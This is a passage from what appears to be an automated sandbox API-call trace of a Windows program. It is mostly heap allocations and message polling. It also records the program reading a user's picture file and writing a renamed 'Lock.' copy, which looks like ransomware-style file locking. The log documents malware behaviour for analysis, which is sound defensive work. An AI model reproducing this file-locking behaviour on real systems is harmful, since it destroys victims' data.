hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0254.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0254.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.964] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.964] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.964] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.964] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/E3PCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e3pct.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0254.965] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.965] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0254.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.E3PCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.e3pct.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0254.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0254.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.967] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0254.967] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x7dc5, lpOverlapped=0x0) returned 1 [0254.969] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0254.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7dc5) returned 0x24c7a50 [0254.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.971] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0254.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0254.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7dc5) returned 0x24c7a50 [0254.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7dc5) returned 0x24d75f0 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.974] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.974] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0254.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.975] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.975] PeekMessageW (in: 